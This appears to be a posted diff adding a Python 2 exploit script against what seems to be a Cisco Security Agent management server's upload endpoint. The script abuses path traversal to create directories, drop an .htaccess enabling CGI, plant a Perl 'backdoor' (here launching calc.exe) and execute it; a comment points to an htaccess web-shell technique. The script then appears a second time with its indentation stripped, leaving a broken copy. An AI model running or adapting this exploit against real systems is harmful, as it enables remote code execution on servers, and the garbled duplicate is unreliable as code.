gerry · August 23, 2016 06:17
diff --git a/st_upload-exploit.py b/st_upload-exploit.py
 #!/usr/bin/env python
 # Thu 24 Jun 2010 04:20:52 AM EDT
 import httplib
 import mimetools
 import StringIO

 _boundary = mimetools.choose_boundary()
 _host_uid = 'C087EFAE-05A2-4A0B-9512-E05E5ED84AEB'
 _csamc = "192.168.0.108"

 # TODO(gerry): Use "Self contained .htaccess web shell" at:
 # http://www.justanotherhacker.com/2011/05/htaccess-based-attacks.html
 # we need to enable some scripting to get command access
 htaccess = "Options +Includes +ExecCGI\r\nAddHandler cgi-script gee"
 perl_path = "#!c:/program files/cisco/csamc/csamc60/perl/5.8.7/bin/mswin32-x86/perl\r\n",
 backdoor = "exec \"calc.exe\";"

 def send_request(params=None):
    buf = StringIO.StringIO()
    headers = {"Content-type": 'multipart/form-data; boundary=%s' % _boundary}

    for(key, value) in params.iteritems():
        buf.write('--%s\r\n' % _boundary)
        buf.write('Content-Disposition: form-data; name="%s"' % key)
        buf.write('\r\n\r\n%s\r\n' % value)
    buf.write('--' + _boundary + '--\r\n\r\n')
    body = buf.getvalue()

    conn = httplib.HTTPSConnection(_csamc)
    conn.request("POST", "/csamc60/agent", body, headers)
    response = conn.getresponse()
    print response.status, response.reason
    conn.close()

 def main():
    ### Build up required dir tree
    dirtree = ["../bin/webserver/htdocs/diag/bin",
               "../bin/webserver/htdocs/diag/bin/webserver",
               "../bin/webserver/htdocs/diag/bin/webserver/htdocs"]
    _params = {
        'host_uid': _host_uid,
        'jobname': None,
        'host': "aa",
        'diags': " ",
        'diagsu': " ",
        'profiler': " ",
        'extension': "gee",
    }
    for path in dirtree:
        print "[+] Creating directory: %s" % path
        _params['jobname'] = path
        send_request(_params)

    ### Done building path, drop files
    print "[+] Dropping .htaccess"
    send_request({
        'host_uid': _host_uid,
        'jobname': '',
        'host': "/../bin/webserver/",
        'diags': "",
        'diagsu': "",
        'profiler': htaccess,
        'extension': "/../.htaccess",
    })

    print "[+] Dropping payload"
    send_request({
        'host_uid': _host_uid,
        'jobname': '',
        'host': "/../bin/webserver/htdocs/gerry",
        'diags': perl_path,
        'diagsu': "",
        'profiler': backdoor,
        'extension': "/../exploit.gee",
    })

    print "[+] Done, Executing dropped file."
    try:
        conn = httplib.HTTPSConnection(_csamc, timeout=1)
        conn.request("GET", "/csamc60/exploit.gee")
        response = conn.getresponse()
        print response.status, response.reason
        print response.read()
    except httplib.ssl.SSLError:
        pass
    print "[+] Finished."

 if __name__ == '__main__':
    main()
	#!/usr/bin/env python
	# Thu 24 Jun 2010 04:20:52 AM EDT
	import httplib
	import mimetools
	import StringIO

	_boundary = mimetools.choose_boundary()
	_host_uid = 'C087EFAE-05A2-4A0B-9512-E05E5ED84AEB'
	_csamc = "192.168.0.108"

	# TODO(gerry): Use "Self contained .htaccess web shell" at:
	# http://www.justanotherhacker.com/2011/05/htaccess-based-attacks.html
	# we need to enable some scripting to get command access
	htaccess = "Options +Includes +ExecCGI\r\nAddHandler cgi-script gee"
	perl_path = "#!c:/program files/cisco/csamc/csamc60/perl/5.8.7/bin/mswin32-x86/perl\r\n",
	backdoor = "exec \"calc.exe\";"

	def send_request(params=None):
	buf = StringIO.StringIO()
	headers = {"Content-type": 'multipart/form-data; boundary=%s' % _boundary}

	for(key, value) in params.iteritems():
	buf.write('--%s\r\n' % _boundary)
	buf.write('Content-Disposition: form-data; name="%s"' % key)
	buf.write('\r\n\r\n%s\r\n' % value)
	buf.write('--' + _boundary + '--\r\n\r\n')
	body = buf.getvalue()

	conn = httplib.HTTPSConnection(_csamc)
	conn.request("POST", "/csamc60/agent", body, headers)
	response = conn.getresponse()
	print response.status, response.reason
	conn.close()

	def main():
	### Build up required dir tree
	dirtree = ["../bin/webserver/htdocs/diag/bin",
	"../bin/webserver/htdocs/diag/bin/webserver",
	"../bin/webserver/htdocs/diag/bin/webserver/htdocs"]
	_params = {
	'host_uid': _host_uid,
	'jobname': None,
	'host': "aa",
	'diags': " ",
	'diagsu': " ",
	'profiler': " ",
	'extension': "gee",
	}
	for path in dirtree:
	print "[+] Creating directory: %s" % path
	_params['jobname'] = path
	send_request(_params)

	### Done building path, drop files
	print "[+] Dropping .htaccess"
	send_request({
	'host_uid': _host_uid,
	'jobname': '',
	'host': "/../bin/webserver/",
	'diags': "",
	'diagsu': "",
	'profiler': htaccess,
	'extension': "/../.htaccess",
	})

	print "[+] Dropping payload"
	send_request({
	'host_uid': _host_uid,
	'jobname': '',
	'host': "/../bin/webserver/htdocs/gerry",
	'diags': perl_path,
	'diagsu': "",
	'profiler': backdoor,
	'extension': "/../exploit.gee",
	})

	print "[+] Done, Executing dropped file."
	try:
	conn = httplib.HTTPSConnection(_csamc, timeout=1)
	conn.request("GET", "/csamc60/exploit.gee")
	response = conn.getresponse()
	print response.status, response.reason
	print response.read()
	except httplib.ssl.SSLError:
	pass
	print "[+] Finished."

	if __name__ == '__main__':
	main()